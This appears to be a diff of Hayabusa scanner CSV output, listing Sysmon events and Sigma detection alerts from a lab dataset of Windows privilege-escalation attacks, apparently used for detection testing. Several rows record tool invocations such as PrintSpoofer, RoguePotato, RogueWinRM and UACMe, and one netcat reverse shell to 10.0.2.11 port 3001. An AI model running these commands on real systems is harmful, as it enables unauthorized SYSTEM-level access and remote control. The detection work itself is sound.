-2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: sihost.exe : Path: C:\Windows\System32\sihost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService : Path: C:\Windows\System32\svchost.exe : User: MSEDGEWIN10\IEUser : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\userinit.exe : Path: C:\Windows\System32\userinit.exe : User: MSEDGEWIN10\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\Explorer.EXE : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\userinit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo : Path: C:\Windows\System32\svchost.exe : User: 
NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 318 0000021FF2606500 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\eventvwr.exe"" : Path: C:\Windows\System32\eventvwr.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Discovery - domain time : Command: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 : Path: C:\BGinfo\BGINFO.EXE : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\SecurityHealthService.exe : Path: C:\Windows\System32\SecurityHealthService.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:18.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe"" /background : Path: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\OneDrive.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: 
""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:21.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 6964 258 0000021FF266EC20 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:20:26.261 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\regedit.exe"" : Path: C:\Windows\regedit.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:08.564 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:18.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.340 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s WinRM : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:21:19.629 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-05-03 03:01:54.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PrintSpoofer.exe -i -c powershell.exe : Path: C:\Users\IEUser\Tools\PrivEsc\PrintSpoofer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.863 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.864 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: powershell.exe : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
PrintSpoofer.exe -i -c powershell.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:54.867 +09:00,MSEDGEWIN10,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: powershell.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-03 03:01:57.418 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_seimpersonate_tosys_spoolsv_sysmon_17_18.evtx -2020-05-07 22:13:02.481 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\ChangePk.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_61_Changepk.evtx 
-2020-05-10 09:09:36.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe"" : Path: C:\Users\IEUser\Tools\PrivEsc\NetworkServiceExploit.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:36.709 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: NetworkServiceExploit.exe -i -c ""c:\Windows\System32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:09:43.372 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-10 09:11:16.714 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_Imperson_NetSvc_to_Sys_Decoder_Sysmon_1_17_18.evtx -2020-05-12 08:21:56.493 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999 : Path: C:\Users\IEUser\Tools\PrivEsc\RoguePotato.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.519 +09:00,MSEDGEWIN10,17,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.562 +09:00,MSEDGEWIN10,18,critical,EfsPotato Named Pipe,,rules/sigma/pipe_created/sysmon_efspotato_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.587 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe : Path: C:\Users\IEUser\Tools\Misc\nc64.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RoguePotato.exe -r 10.0.2.11 -e ""c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe"" -l 9999",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:21:56.661 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Users\IEUser\tools\misc\nc64.exe 10.0.2.11 3001 -e cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-12 08:22:26.650 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_roguepotato_sysmon_17_18.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: Akagi.exe 58 c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\Akagi.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.019 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: consent.exe 328 310 0000028A37652590 : Path: 
C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386 : Path: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,UAC Bypass Tool UACMe,,rules/sigma/process_creation/win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.390 +09:00,MSEDGEWIN10,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 00:06:49.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Users\IEUser\AppData\Local\Temp\DNeruK\system32\Clipup.exe -o -previd pe386,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_uacme_58.evtx -2020-05-13 09:28:16.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s 
PlugPlay,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.914 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-13 09:28:52.950 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceAndNoImpersonation -p -s wcncsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/revshell_cmd_svchost_sysmon_1.evtx -2020-05-24 10:13:47.756 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe : Path: C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ""cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:48.864 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent 
Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:50.327 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: RogueWinRM.exe -p c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:51.206 +09:00,MSEDGEWIN10,3,high,Remote PowerShell Session,,rules/sigma/network_connection/sysmon_remote_powershell_session_network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: c:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx -2020-05-24 10:13:54.120 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/RogueWinRM.evtx 
